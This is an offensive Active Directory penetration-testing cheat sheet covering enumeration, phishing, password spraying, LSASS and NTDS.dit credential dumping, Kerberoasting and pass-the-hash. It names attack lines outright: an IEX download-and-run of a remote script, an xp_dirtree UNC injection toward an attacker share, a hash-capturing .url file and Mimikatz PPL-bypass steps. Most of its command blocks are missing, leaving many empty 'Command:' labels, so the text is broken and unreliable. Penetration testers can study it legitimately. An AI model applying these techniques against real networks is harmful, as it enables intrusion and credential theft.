The Ultimate Active Directory CheatSheet
Last updated
Last updated
Mission: This guide is designed to be your comprehensive tactical field manual for dissecting Active Directory environments. It meticulously integrates common techniques, tools, and commands in a phased approach, drawing from expert sources and aiming for exhaustive detail for penetration testers and security professionals.
"First Of All There Is No Writeup Or Cheat Sheet Can Contains Every Thing Our This Cheat Sheet Is The Notes And The Details So Far Till Now in My Journey In AD Wish You Like It"
A Note on Tooling: This guide has been updated to reflect the transition from CrackMapExec (CME) to its successor, NetExec (nxc). Commands previously using cme will now use nxc. NetExec is actively maintained and offers the same powerful capabilities.
Before we jump into the attacks, let's ensure we're all on the same page with some foundational AD concepts. Understanding these is key to knowing why certain attacks work.
The Crown Jewels (ntds.dit): Think of this as the main AD treasure chest. It's a database file, usually hiding at C:\Windows\NTDS\ntds.dit (though this path can be changed by an administrator). It holds everything about the domain: users, groups, computers, Group Policy information, and most importantly, those precious password hashes (NTLM hashes and Kerberos keys) for all domain accounts. Access to this file is paramount for an attacker aiming for full domain compromise.
The Keepers of the Kingdom (Domain Controllers - DCs): These are the workhorse servers that host and replicate the AD database (ntds.dit). They handle who gets in (authentication via Kerberos Key Distribution Center - KDC, LDAP) and what they can do (authorization). Usually, multiple DCs exist for redundancy and load balancing. Since Windows 2000, AD uses a multi-master replication model, meaning (with some exceptions for specific operations/FSMO roles) changes can be made on any writable DC and will replicate to others.
The Kingdom Itself (Domain): This is your main boundary for administration, security, and policies in AD. It's a collection of all the users, computers, groups, and other objects that share the same directory database, security policies (like password policy), and trust relationships.
Domains, Trees, and Forests - The Bigger Picture:
Tree: Imagine a family tree of domains. They're hierarchically linked (parent-child relationships) and share a contiguous DNS namespace (like corp.example.com with its child europe.corp.example.com). DNS is a critical component and absolutely essential for AD functionality. Trusts between domains in a tree are typically two-way and transitive by default.
Forest: Now picture a collection of these "family trees" (one or more domain trees). They all agree on the basic rules (Schema - defines object classes and attributes), share some common info (Configuration partition, Global Catalog), and have trust connections (typically two-way, transitive) between the roots of each tree. The first domain created in a forest is the forest root domain.
Organizational Units (OUs): These are like folders within your domain, used to organize users, computers, other OUs, or other objects. They often mirror a company's departmental or geographical structure. OUs are crucial for delegating administrative control over specific sets of objects and for applying specific Group Policies. This is not a security boundary in itself, but a management one.
Mapping the Network (Sites): Sites in AD usually reflect your physical network layout (e.g., different office locations connected by WAN links, defined by IP subnets). This helps ensure client computers and member servers authenticate to and locate services (like DCs or DFS shares) on the closest (in terms of network topology and cost) servers, which speeds things up and optimizes WAN bandwidth usage by controlling replication traffic.
The Rulebooks (Group Policy Objects - GPOs): GPOs are sets of rules and configuration settings that dictate how systems look and behave for users and computers. They're the command center for security settings (password policies, account lockout, audit policies, AppLocker), software rollouts, login scripts, desktop configurations, and tons more. Most GPO settings translate to registry key changes on target machines. GPOs are linked to Sites, Domains, or OUs. The "Group Policy Client" service on Windows machines applies these settings.
SYSVOL: This is a special shared folder replicated across all DCs in a domain (you can typically get to it via \\<DOMAIN_NAME>\SYSVOL\<DOMAIN_NAME>\Policies or \\<DC_IP>\SYSVOL\<DOMAIN_NAME>\Policies). It holds all the GPO template data (settings files like .ini, .pol, .xml, .inf) and scripts (logon, logoff, startup, shutdown). Authenticated domain users can read most of its contents, making it a potential source for finding sensitive information (like passwords in old GPP XML files) or misconfigurations.
The Directory's Language (LDAP - Lightweight Directory Access Protocol): This is the primary protocol applications and tools use to query and modify information in Active Directory. It usually runs on TCP port 389 (unencrypted LDAP) or TCP port 636 (LDAP over SSL/TLS, known as LDAPS). LDAP queries can be very specific, making it efficient for enumeration. LDAP logs can be voluminous, sometimes making malicious enumeration harder to spot for defenders.
The Gatekeeper (Kerberos): This is AD's primary network authentication protocol. It's a ticket-based system (Ticket Granting Tickets - TGTs, and Ticket Granting Service tickets - TGSs/service tickets) designed to provide strong authentication for client/server applications by using secret-key cryptography.
NTLM (New Technology LAN Manager): An older challenge-response authentication protocol.
NTLM as a protocol (MS-NLMP): Used for network authentication. It has versions: LM (Lan Manager - very weak, DES-based), NTLMv1 (weak, MD4-based), and NTLMv2 (stronger, HMAC-MD5 based, but still weaker than Kerberos).
NTLM as a hash: The NTLM hash (MD4 of UTF-16LE password) is used to store passwords on disk (in SAM for local accounts, ntds.dit for domain accounts).
While less preferred than Kerberos, NTLM is often still enabled for compatibility. Its presence opens up attack vectors like Pass-the-Hash and NTLM relay.
Local Password Stash (SAM - Security Accounts Manager): On individual Windows machines (workstations, member servers, and DCs for their DSRM accounts), the SAM file (C:\Windows\System32\config\SAM) stores NTLM hashes for local user accounts. It's protected by the SYSTEM account.
The Security Enforcer (LSASS - Local Security Authority Subsystem Service): The lsass.exe process is critical. It handles user logins (interactive, network, service), security policy enforcement, password changes, and creates access tokens that define a user's privileges. Because of this role, LSASS memory often contains credentials (plaintext passwords, NTLM hashes, Kerberos tickets/keys) for recently logged-on users and active service accounts, making it a prime target for credential dumping. LSA Protection (PPL) and Credential Guard can make this harder.
SAMR (Security Account Manager Remote Protocol): A legacy, SMB-based protocol that can be used for enumerating users, groups, and other domain information. It's slower and provides less information than LDAP but might be useful if LDAP is restricted.
PKI (Public Key Infrastructure) & ADCS (Active Directory Certificate Services): ADCS allows organizations to manage their own PKI, issuing digital certificates for authentication, encryption, and signing. Components include Certificate Authority (CA), Certificate Templates, Enrollment Services, Certificate Revocation Lists (CRLs), Online Certificate Status Protocol (OCSP). Misconfigurations can lead to severe vulnerabilities. ADCS integrates tightly with AD DS.
Certificate Templates: Predefined configurations for certificates (purpose, key size, validity, issuance policies). Stored as AD objects (pKICertificateTemplate).
Enrollment Services: Enterprise CAs publish themselves here. Clients find CAs based on objects in this container.
NTAuthCertificates Object: Defines CA certificates trusted for AD authentication. Client certs used for AD auth must be signed by a CA in this store.
AIA (Authority Information Access) Container: Hosts intermediate and cross-CA certificates for chain validation.
Trusts: Relationships between domains/forests allowing users from one to access resources in another.
Types: Parent-Child, Tree-Root (intra-forest, transitive by default); External (inter-forest, non-transitive by default, SID filtering usually enabled); Forest (inter-forest, transitive, SID filtering can be complex). Shortcut/Cross-Link (intra-forest, optimize auth paths). Realm (Windows to non-Windows Kerberos).
Direction: Direction of trust is opposite to direction of access (e.g., Domain A trusts Domain B means users in B can access resources in A).
Authentication Levels (Cross-Forest): Forest-wide (intra-forest default), Domain-wide, Selective Authentication (most secure, requires "Allowed-To-Authenticate" right on resource's DACL for trusted principal).
SID Filtering: Security mechanism on trusts (especially external/forest) to prevent SIDs from a trusted domain/forest from granting unintended privileges in the trusting domain/forest (e.g., filtering well-known SIDs or SIDs not belonging to the trusted domain).
SCCM (System Center Configuration Manager / MECM / ConfigMgr): System management software for managing large groups of Windows-based computers. Used for patch management, software distribution, OS deployment. Components: Primary Server, Site Database (MSSQL), SMS Provider, Distribution Point (DP), Management Point (MP).
MSSQL Server: Relational database management system. Often integrated with AD. Uses Transact-SQL (T-SQL).
Microsoft Exchange Server: Email, calendaring, contacts, tasks. Components: Autodiscover, Outlook Web App (OWA), Exchange Web Services (EWS), MAPI/HTTP, ActiveSync.
Your Goal Here: To suck up every piece of information you can about the target's Active Directory setup. You're looking for chinks in the armor, high-value targets (Domain Admins, other privileged users like server admins/helpdesk/developers, executives), soft targets (weak/old passwords, never-logged-in accounts), network topology (based on AD sites, IP ranges), Group Policy weaknesses and protections, software deployments (e.g., SCCM), Exchange configurations, MSSQL instances, ADCS setup, trust relationships, services and service accounts, delegation rights, and pathways for your attack. Think of this as drawing a detailed map of the battlefield.
Your Goal Here: Find out which machines are alive on the network, what ports they have open, and what services are listening on those ports.
Pro Tip: Start wide, then zoom in. External scanning (if applicable) uses different assumptions than internal scanning. Consider the assessment type (black-box, grey-box, white-box) and client-imposed restrictions (e.g., testing from a managed VDI with limited tools).
Your Toolkit & Commands:
Nmap (The Network Mapper's Best Friend)
Finding Live Hosts (Ping Sweeps):
Command:
Purpose: No port scan (ping sweep only). Discovers live hosts using ICMP, ARP, and TCP ACK/SYN on common ports.
<IP_Range/CIDR>: Target network (e.g., 192.168.1.0/24).
Command:
Purpose: More thorough host discovery using ICMP echo (-PE), TCP SYN to port 445 (-PS445), TCP ACK to port 80 (-PA80), and IP Protocol Ping (-PP). No port scan (-sn).
Command:
(Older syntax for -sn)
Purpose: Ping sweep, saves live hosts to live_hosts.txt.
Host Discovery Types: -PE (ICMP Echo), -PP (ICMP Timestamp), -PM (ICMP Address Mask), -PS<portlist>, -PA<portlist>, -PU<portlist>, -PY<portlist>, -PR (ARP Ping - local, fast, reliable), -Pn or -P0 (Skip host discovery).
Basic Port Scanning (TCP):
Command:
Purpose: TCP Connect Scan (completes full handshake). Reliable but noisy.
Command:
Purpose: TCP SYN Scan ("half-open" scan). Stealthier, often needs root/admin. Default if privileges allow.
Command:
Purpose: Fast scan of the most common 100 ports from nmap-services.
Command:
(e.g., -p 80,443,3389 or -p T:22,U:53,161)
Purpose: Scan specific ports.
Command:
Purpose: Scan all TCP ports (1-65535). Can be very slow.
Command:
Purpose: Scan the <Number> most common TCP ports.
Command:
Purpose: Scan ports sequentially, not randomized.
UDP Scanning:
Command:
Purpose: Scans common UDP ports. Can be slow and less reliable.
Command:
Purpose: Scans the top 20 most common UDP ports.
Command:
Service Version & OS Detection:
Command:
Purpose: Attempts to determine service versions on open ports.
Command:
(Default 7; higher is more thorough)
Command:
(Debug version scan)
Command:
Purpose: Attempts to determine the operating system. Usually needs root/admin and an open & closed TCP port.
Command:
(Limit OS detection to promising targets)
Command:
(More aggressive OS guessing)
Command:
Purpose: Aggressive scan. Enables OS detection (-O), version detection (-sV), default script scanning (-sC), and traceroute (--traceroute). Noisy.
Comprehensive Initial Scan Example:
(Save all formats)
Nmap Scripting Engine (NSE):
Command:
or
Purpose: Runs the default set of "safe" NSE scripts.
Command:
Purpose: Runs scripts categorized for host/service discovery.
Command:
Purpose: Runs scripts that check for known vulnerabilities. Use with caution and proper authorization.
Command:
Purpose: Runs specific, comma-separated NSE scripts.
Command:
(e.g., smb-os-discovery, smb-enum-shares, smb-vuln-*)
Command:
(e.g., ldap-search -b "dc=example,dc=com" "(objectClass=*)")
Command:
Command:
Command:
Command:
Purpose: Example of running a specific script (http-shellshock) against ports 80 and 443, with script-specific arguments (uri).
Command:
(Help for a script)
Timing & Performance:
Commands:
or
Purpose: Control scan speed and stealth. T0 is slowest/stealthiest, T5 is fastest/noisiest. T3/T4 are common.
Command:
Purpose: Ensures Nmap sends at least/at most <PacketsPerSecond>.
Command:
(Default 10)
Purpose: Specifies the maximum number of port scan probe retransmissions.
Other timing options:
(e.g., 10m)
Firewall/IDS Evasion & Spoofing (Use ethically and with authorization):
(Fragment packets - 8-byte frags),
or
(Idle Zombie Scan)
or
or
or
(Local Ethernet segment only)
(Send bad checksums)
Advanced Scan Types:
(TCP NULL),
(TCP FIN),
(Xmas Scan) (Stealthy, RFC 793 based, not for Windows)
(TCP ACK Scan - map firewall rules, filtered/unfiltered)
(Custom TCP flags: URG, ACK, PSH, RST, SYN, FIN)
(IP Protocol Scan - TCP, UDP, ICMP, IGMP etc.)
Output Formats:
Command:
Command:
Command:
Command:
(Saves in All major formats: .nmap, .xml, .gnmap)
DNS Resolution: -R (Force reverse DNS), -n (Disable reverse DNS - faster), --system-dns, --dns-servers <servers>
Scanning for AD-Specific Ports:
Command:
Purpose: Scans a comprehensive list of common AD-related ports, including RPC dynamic range.
Key AD Ports to Know:
DNS (53/tcp/udp)
Kerberos (88/tcp/udp)
RPC EPMAP (135/tcp/udp)
NetBIOS Name Service (137/udp)
NetBIOS Datagram Service (138/udp)
NetBIOS Session Service (139/tcp)
LDAP (389/tcp/udp)
SMB (445/tcp)
Kerberos Pwd Change (464/tcp/udp)
RPC over HTTP (593/tcp)
LDAPS (636/tcp)
MSSQL (1433/tcp)
Global Catalog LDAP (3268/tcp)
Global Catalog LDAPS (3269/tcp)
WinRM HTTP (5985/tcp)
WinRM HTTPS (5986/tcp)
AD Web Services (ADWS) (9389/tcp)
RPC Dynamic Ports (Default: 49152-65535/tcp for Win2008+; Older: 1025
Masscan (For very large networks - extremely fast asynchronous port scanner)
Command:
(TCP)
Purpose: Extremely fast TCP port scanner.
<Port(s)>: Ports to scan (e.g., 80, 0-65535).
<Rate>: Packets per second (e.g., 100000). Use high rates with caution.
Command:
(UDP)
Purpose: Extremely fast UDP port scanner.
Tool Link: robertdavidgraham/masscan (GitHub)
Ping / fping:
Command:
Purpose: Sends ICMP echo requests to check host liveness.
Command:
Purpose: Pings a range and shows only live (-a) hosts. -g generates the range. Errors suppressed.
Netdiscover:
Command:
Purpose: Discovers hosts on the local network using ARP requests. -r specifies the range, -i the interface.
Metasploit Scanning Modules: auxiliary/scanner/portscan/tcp, auxiliary/scanner/discovery/arp_sweep
Searchsploit:
Passive Network Sniffing (Wireshark, tcpdump):
On attack host:
Look for ARP, MDNS, NBT-NS, DHCP, DNS traffic to identify active hosts and potential services.
Wireshark filter examples: arp, mdns, nbns, bootp, dns.
Your Goal Here: Figure out where the Domain Controllers are, understand the domain and forest layout, identify trust relationships, and pinpoint AD-specific services.
Pro Tip: LDAP is excellent for structured queries. SAMR is a legacy alternative. DNS (SRV records), SMB, and RPC are key.
Your Toolkit & Commands:
DNS Digging:
Dnsrecon:
Command:
Purpose: Enumerates DNS SRV records (often point to AD services).
Command:
(Attempts AXFR zone transfer)
Command:
(Standard record enumeration)
Nslookup:
Command:
Purpose: Queries DNS for SRV records for LDAP services (finds DCs).
Command:
Purpose: Finds Kerberos KDCs (usually DCs).
Command:
Purpose: Finds Global Catalog servers.
Also useful: _ldap._tcp.pdc._msdcs.<Domain_Name> (PDC Emulator)
Nltest (Windows built-in):
Command:
Purpose: Lists all Domain Controllers for the specified domain.
Command:
Purpose: Queries DNS for a DC and displays its capabilities.
Command:
Purpose: Shows domain trust relationships for the current domain.
Command:
(Secure channel status)
Dig (Linux DNS tool):
Command:
Purpose: Attempts a DNS zone transfer. Highly valuable if successful, often blocked.
Command:
Purpose: Similar to nslookup for finding LDAP SRV records.
PowerShell (ADModule or built-in):
Command:
Purpose: PowerShell equivalent for querying SRV records.
adidnsdump:
(Resolve unknown records)
SMB/NetBIOS Snooping:
enum4linux-ng:
Command:
(Comprehensive "do everything")
Command:
(Enumerates users)
Command:
(Enumerates shares)
Also: -P (password policy), -G (groups), -o (OS info).
nbtscan:
Command:
(Scans range for NetBIOS info)
Command:
(Scans single host)
NetExec (nxc, formerly CrackMapExec):
Command:
(Basic SMB enum: OS, null sessions, SMB signing)
Command:
Command:
(Null session user enum)
Command:
smbmap:
Command:
(List shares anonymously)
Command:
(Recursive dir listing)
LDAP Interrogation (The core of AD enumeration):
ldapsearch (Linux OpenLDAP tool):
Anonymous RootDSE:
Purpose: Critical first step. Gets naming contexts (base DNs for further queries) and server capabilities. -x for simple auth, -H for LDAP URI, -s base for base search, -b "" for empty base (rootDSE), + for operational attributes.
Anonymous Users:
Anonymous Groups:
Anonymous Computers:
Authenticated:
-D: Bind DN (e.g., cn=user,dc=corp,dc=local or user@corp.local).
-w: Password.
ADExplorer (Sysinternals): Visual AD browsing, snapshots for offline analysis.
JXplorer / LDAPAdmin: Cross-platform GUI LDAP browsers.
PowerView (PowerSploit PowerShell module):
or
or
or
or
or
or
(Shows password policy, Kerberos, lockout)
(Password & lockout policies)
(Kerberos ticket lifetimes)
ADModule (Built-in PowerShell module):
(Finds PDC Emulator)
windapsearch.py:
Also --all-attributes, --custom <filter>.
ldapdomaindump (Python tool):
Command:
Purpose: Dumps domain info (users, groups, computers, policies) into HTML/JSON for offline review.
RPC Probing:
rpcclient (Linux Samba tool):
Command:
(Attempts null session connection)
If successful, sub-commands: srvinfo, enumdomusers, enumdomgroups, queryuser <RID>, lookupnames <Name>, lookupsids <SID>, lsaquery.
Authenticated:
rpcdump.py (Impacket Python script):
Command:
(Lists available RPC endpoints)
Command:
(Queries RPC endpoint mapper directly)
Nmap NSE for RPC:
MSSQL Enumeration:
Nmap:
PowerUpSQL:
NetExec (nxc):
Exchange Enumeration:
Nmap NSE:
ntlmscan (Python):
Ruler, MailSniper for deeper interaction (e.g., Invoke-PasswordSprayOWA, Get-GlobalAddressList).
Version enum:
SCCM (Microsoft Endpoint Configuration Manager) Enumeration:
sccmhunter:
(profile, list shares, PXEBoot vars).
SharpSCCM: .NET tool for SCCM enumeration and abuse.
LDAP: Look for CN=System Management,CN=System container. Object classes mssmsmanagementpoint, mssmssite.
ADCS (Active Directory Certificate Services) Enumeration:
Certify.exe (Windows): Certify.exe find /vulnerable, Certify.exe cas (list CAs).
Certipy (Linux/Python):
PSPKI (PowerShell): Get-CertificationAuthority, Get-CertificationAuthorityAcl.
Check Cert Publishers group membership:
(on DC).
LDAP: CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=<com>. Containers: Certification Authorities, Enrollment Services, Certificate Templates, NTAuthCertificates.
Your Goal Here:
Pinpoint specific users (privileged, service accounts, stale accounts).
Identify groups (membership, admin groups, groups with modifiable ACLs).
Enumerate computers (OS, roles, delegation settings).
Analyze GPOs (settings, linked OUs, vulnerable GPPs).
Understand OU structure (GPO linkage, delegation of control).
Examine ACLs (permissions on objects, looking for misconfigurations like GenericAll, WriteDACL, WriteOwner).
Map trust relationships.
Pro Tip:
Look for descriptions (e.g., password in description).
Check pwdLastSet (old passwords) and lastLogonTimestamp (inactive accounts).
Identify SPNs (Kerberoasting targets).
Analyze userAccountControl flags (delegation settings, DONT_REQ_PREAUTH).
Examine msDS-AllowedToDelegateTo (constrained delegation).
Note adminCount=1 (AdminSDHolder protection).
PowerView & ADModule are excellent for this.
BloodHound visualizes attack paths.
NetExec (nxc) scales enumeration, especially with credentials.
Working with PowerShell Modules:
(RSAT needed or on DC/member)
(or IEX (New-Object Net.WebClient).DownloadString('http://host/PowerView.ps1'))
Your Toolkit & Commands:
PowerView (PowerSploit PowerShell module):
Domain/Forest Info:
(Or Get-Domain)
Users:
Groups:
Computers:
GPOs:
OUs:
ACLs:
Trusts:
User Hunting / Session Snooping (Often needs local admin on targets):
ADModule (PowerShell's Official AD Cmdlets):
Users:
Groups:
Computers:
GPOs:
OUs:
Trusts:
Forest:
AppLocker Policy:
BloodHound (Visual Attack Path Analysis):
Collectors:
SharpHound (C#):
(Default)
(Stealthier)
(Specific computer enumeration)
Comprehensive:
Key Collection Methods:
Group
LocalAdmin
Session
Trusts
ACL
Container
RDP
DCOM
PSRemote
GPOLocalGroup
LoggedOn
ObjectProps
SPNTargets
UserRights
CARegistry
DCRegistry
Invoke-BloodHound (PowerShell):
BloodHound.py (Python):
Certipy for AD CS data:
Analysis: Import JSON/ZIP to BloodHound GUI. Neo4j setup: sudo neo4j console or Docker. Access GUI at http://localhost:7474.
Custom Queries: hausec/Bloodhound-Custom-Queries, CompassSecurity/BloodHoundQueries, ly4k/Certipy BloodHound Custom Queries.
NetExec (nxc, formerly CrackMapExec):
SMB:
LDAP:
ADRecon:
Sysinternals ADExplorer: GUI tool for browsing AD database, taking snapshots.
PingCastle: Auditing AD security level.
Group3r: Auditing GPO misconfigurations.
Snaffler: Finding sensitive files on shares.
LAPS Toolkit: Find-LAPSDelegatedGroups, Find-AdmPwdExtendedRights, Get-LAPSComputers (if LAPS is deployed). Get-AdmPwdPassword -ComputerName <CompName>.
Living Off The Land (LOLBAS) for Enumeration (Windows Native):
(requires RSAT or on DC)
(Applied GPOs for current user/computer)
(Check current user privileges)
(Check RDP sessions)
PowerView: Find-DomainUserLocation, Invoke-UserHunter -CheckAccess, Invoke-EnumerateLocalAdmin -Verbose
Kerbrute:
(Uses Kerberos Pre-Auth failures to validate users, stealthier than SMB enumeration).
Compile from source:
NetExec (nxc):
(If null session allowed).
rpcclient:
then enumdomusers.
windapsearch.py:
(Anonymous LDAP users).
Passive Network Analysis: Wireshark/tcpdump for ARP, MDNS, NBT-NS to identify hosts.
Responder in Analyze mode:
(Analyze mode for NetBIOS-NS/LLMNR broadcasts).
Your Goal Here: Gain an initial entry point into the network or onto a system within the AD environment.
Pro Tip: This often involves exploiting vulnerabilities in public-facing applications, tricking users via phishing, leveraging password reuse/spraying against externally accessible services, or exploiting external misconfigurations. C2 frameworks like Covenant or Sliver are crucial for payload generation, delivery, and post-access operations.
Your Toolkit & Commands/Techniques:
Exploiting Public-Facing Applications:
Web Vulnerabilities (SQLi, RCE, LFI/RFI, XXE, Deserialization, SSRF, etc.):
Tools: sqlmap, Burp Suite, OWASP ZAP, Metasploit, custom exploit scripts.
Example (sqlmap):
VPN Vulnerabilities: Search Exploit-DB, GitHub, Metasploit for CVEs (e.g., Pulse Secure, Fortinet, Citrix).
Mail Server Exploits (Exchange: ProxyLogon, ProxyShell, ProxyNotShell, OWASSRF, CVE-2020-0688): PoCs, Metasploit.
Other Exposed Services (RDP, SSH, Jenkins, Tomcat, JBoss, SharePoint, Struts): Default creds, brute-force (hydra, medusa, nxc), known exploits.
Phishing & Spear Phishing:
Malicious Attachments: Office macros (VBA Stomping), ISO/LNK/HTA/CHM, weaponized PDFs.
Tools: Unicorn, Macro_Pack, EvilOffice, Luckystrike.
Credential Harvesting: Fake login pages (O365, VPN).
Tools: Gophish, Social-Engineer Toolkit (SET), Evilginx2 (MitM for 2FA), CredSniper.
Link-Based Attacks: Drive-by downloads (BeEF).
DDE Attacks: Office DDE to execute commands.
Further Reading: "The Hitchhiker's Guide To Initial Access", "Phishing with Empire".
Password Spraying:
Goal: Try few common passwords (e.g., "Spring2024!", "Password123") against many usernames.
Pro Tip: Mind lockout policies (Get-DomainPolicy, enum4linux-ng -P). Spray slowly. Target SMB, LDAP, OWA, EWS, WinRM, Azure AD, RDP.
Tools:
NetExec (nxc):
MSOLSpray (Azure/O365):
Spray (Go tool):
Ruler (Exchange)
DomainPasswordSpray.ps1:
Kerbrute:
Custom Scripts: Using PowerShell Invoke-RestMethod or Python requests for web-based login forms.
URL File Attacks (NTLM Hash Capture with Responder): .url file with IconFile=\\<AttackersResponderIP>\%USERNAME%.icon.
LLMNR/NBT-NS/mDNS Poisoning (Responder/Inveigh):
Responder (Linux):
(Poisoning mode) or -A (Analyze mode). Hashes logged to /usr/share/responder/logs/.
Inveigh (Windows PowerShell/C#):
(PowerShell). Inveigh.exe (C# version, interactive console with GET NTLMV2UNIQUE).
Mitigation: Disable LLMNR/NBT-NS via GPO/local settings. Enable SMB Signing. Network segmentation.
Detection: Monitor UDP 5355, 137. Event ID 4697, 7045. Registry changes for EnableMulticast.
Exploiting External Misconfigurations: Open SMB, RDP/WinRM with weak creds, default creds on devices, leaked creds (GitHub, Pastebin), DNS misconfigs. Check for misconfigured cloud services (S3 buckets, Azure Blobs) connected to AD, or OAuth misconfigurations.
Supply Chain Attacks: Compromising a less secure third-party vendor or software update mechanism. (Highly sophisticated, typically out of scope for standard pentests unless specified).
C2 Frameworks for Payload Generation & Delivery:
Covenant C2: .NET C2. Setup: dotnet run. Create Listeners, Launchers (PowerShell, Binary, ShellCode, MSBuild, etc.).
Sliver C2: Go-based. generate beacon ..., generate stager ....
Your Goal Here: Obtain valid credentials (plaintext passwords, NTLM hashes, Kerberos tickets and keys) to expand access and move laterally.
Pro Tip: LSASS memory is a prime target. Kerberos tickets are gold. Always try to operate in memory if possible to avoid disk-based detection. Shadow copies can be used to access locked files like NTDS.dit or SAM hives. Be aware of LSA Protection (PPL) and Credential Guard, which make LSASS dumping harder.
Your Toolkit & Commands:
Dumping LSASS Memory (lsass.exe):
Mimikatz (admin/SYSTEM):
❗ LSA Protection (PPL) Bypass:
Kernel (Driver): mimidrv.sys (!+, !processprotect /process:lsass.exe /remove, dump, !-)
Userland (Malicious SSP): misc::memssp (Logs to kiwissp.log or mimilsa.log. Noisy, needs reboot/new logons).
Userland (PPLDump tool)
❗ Credential Guard: If enabled, lsaiso.exe virtualizes LSASS. Mimikatz usually can't get plaintext/TGTs from lsass.exe.
ProcDump (Sysinternals):
On target (Admin/SYSTEM):
(-ma: full dump)
Offline (with Mimikatz):
Windows Task Manager: GUI, less stealthy, right-click lsass.exe -> "Create dump file".
Metasploit (Meterpreter with SYSTEM): load kiwi, creds_all, kerberos, msv. Modules: post/windows/gather/smart_hashdump, post/windows/gather/credentials/mimikatz, post/windows/gather/lsa_secrets.
SharpDump (.NET): Assembly for LSASS dump.
gsecdump: Older tool, likely detected.
NetExec Modules: lsassy, procdump, handlekatz, nanodump.
(Specify format for pypykatz parsing)
Extracting Hashes from SAM/SYSTEM (Local Accounts):
Live (admin/SYSTEM):
(optional, for LSA secrets). Copy hives offline.
Offline (Impacket secretsdump.py):
Mimikatz (offline):
Mimikatz (live):
Metasploit (Meterpreter): hashdump, run post/windows/gather/hashdump
NetExec (nxc):
Dumping NTDS.dit (Domain Controller - All Domain Hashes & Keys):
VSS (Volume Shadow Copy) - Preferred on live DC (DA or SeBackupPrivilege):
ntdsutil.exe:
Copy C:\ntds_backup\Active Directory\ntds.dit and C:\ntds_backup\registry\SYSTEM.
vssadmin.exe:
Copy files from shadow path (e.g., \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\ntds.dit and ...\System32\config\SYSTEM). Cleanup:
diskshadow.exe script:
Offline (Impacket secretsdump.py):
Metasploit (Meterpreter on DC): post/windows/gather/credentials/domain_hashdump
Invoke-NinjaCopy (PowerSploit): Copies locked files (needs SeBackupPrivilege).
NetExec (nxc):
(drsuapi is DCSync)
Kerberoasting (Service Accounts with SPNs):
Goal: Request TGS for service accounts (RC4 encrypted with service account's NTLM hash). Crack offline. Any domain user.
PowerView:
ADModule:
Impacket GetUserSPNs.py:
With hash: -hashes <LM:NT>
Rubeus:
NetExec (nxc):
Cracking:
(RC4-HMAC)
Detection: Event ID 4769 (TGS request) with RC4, high volume.
Mitigation: Strong passwords for service accounts (25+ chars), gMSA, prefer AES for Kerberos (msDS-SupportedEncryptionTypes), monitor TGS requests.
AS-REP Roasting (Users with Pre-auth Disabled):
Goal: Request AS-REP (encrypted with user's NTLM hash) for users with "Do not require Kerberos preauthentication". Crack offline. No domain creds needed for enum if anonymous LDAP.
PowerView:
ADModule:
Force Disable Pre-auth (if write perms):
Impacket GetNPUsers.py:
Rubeus:
NetExec (nxc):
(if no creds needed for enum)
Cracking:
(Kerberos 5 AS-REP etype 23)
Detection: Event ID 4768 (TGT request) error 0x19, or successful TGTs for these accounts. Event ID 4738 (user account changed).
Mitigation: Disable "Do not require Kerberos preauthentication". Strong passwords. Monitor attribute changes.
Searching for Passwords in Files/Registry/GPOs/Config Artifacts:
SYSVOL (GPP Passwords): PowerView Get-GPPPassword, NetExec nxc smb <DC_IP> ... --gpp-passwords. Manual: Look in \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\ for Groups.xml, Services.xml, ScheduledTasks.xml. Decrypt cPassword attribute using gpp-decrypt or online tools.
Config Files: web.config, application.ini, unattend.xml, php.ini, .env.
Scripts: PowerShell, batch, VBS, Python.
User Docs: passwords.txt, creds.xlsx.
Registry: VNC, RDP managers, FTP clients.
Tools: grep, findstr, Invoke-ShareFinder, SharpShares, Invoke-FileFinder, Snaffler.
NetExec Modules: gpp_password, gpp_autologin.
Dumping Browser Credentials: LaZagne, SharpChromium, Mimikatz (dpapi::chrome, dpapi::firefox).
Dumping DPAPI Protected Secrets (Windows Data Protection API):
Mimikatz:
Get masterkey:
(if SYSTEM context) or /rpc (if remote) or by providing user's password/hash.
<Path_to_MasterKeyFile>: Typically C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<User_SID>\...
Decrypt credential:
SharpDPAPI:
LSA Secrets / Policy Secrets (often contains service account passwords):
Mimikatz (SYSTEM): token::elevate, lsadump::secrets.
secretsdump.py (offline against SYSTEM and SECURITY hives).
MSSQL Credential Harvesting: UNC Path Injection: EXEC master..xp_dirtree '\\attacker_smb\share'. PowerUpSQL: Get-MSSQLLinkPasswords, Get-MSSQLCredential.
Exchange Credential Harvesting: Embed SMB links in emails/calendar invites.
Your Goal Here: Use compromised credentials (plaintext, hash, ticket) or exploits to gain access to other systems within the network, moving closer to high-value targets.
Pro Tip: Choose technique based on the credentials you have and the services available on the target. Prioritize stealth and "living off the land" where possible. NTLM Relay is powerful if SMB signing is disabled or not required on target services. C2 frameworks like Sliver can manage pivots and deploy agents. Be aware of UAC remote restrictions (RID 500 vs. other local admins).
Your Toolkit & Commands (assuming you have credentials/tickets):
Pass-the-Hash (PtH) with NTLM Hashes:
NetExec (nxc - SMB):
Impacket (Linux):
Metasploit exploit/windows/smb/psexec module:
Invoke-SMBExec / Invoke-WMIExec (PowerSploit - PowerShell):
Mimikatz (for OverPass-the-Hash - creates new process with tickets from hash):
Pass-the-Ticket (PtT) with Kerberos Tickets (.kirbi files):
Mimikatz (Windows):
(Injects ticket into current session)
Rubeus (Windows):
Impacket (Linux): Set env var: export KRB5CCNAME=/path/to/ticket.ccache. Then use Impacket tools with -k -no-pass.
PsExec (after PTT on Windows):
(-k uses Kerberos)
OverPass-the-Hash (OPtH) / Pass-the-Key (NTLM Hash or AES Key to get Kerberos Tickets):
Mimikatz (Windows):
Rubeus (Windows):
Option: /outfile:ticket.kirbi instead of /ptt.
Remote Desktop Protocol (RDP) - Port 3389:
Plaintext:
Linux:
Windows:
(prompts for creds)
Restricted Admin Mode (/restrictedadmin):
Condition: Enabled on target. Allows RDP using network logon (hash/ticket).
Windows (after PtH/PtT):
Check if enabled:
(0 = enabled, 1 or not exist = disabled).
Enable (needs admin on target):
Pass-the-Hash/Ticket with RDP:
Linux:
Windows (after Rubeus asktgt and ptt): mstsc /restrictedAdmin
SharpRDP: .NET tool for non-GUI RDP command execution.
Clean RunMRU:
(Clears RDP connection history)
Pro Tip: Check for existing RDP sessions using qwinsta /server:<Target_IP>. If you have admin rights on the target, you might be able to hijack sessions (e.g., using tscon).
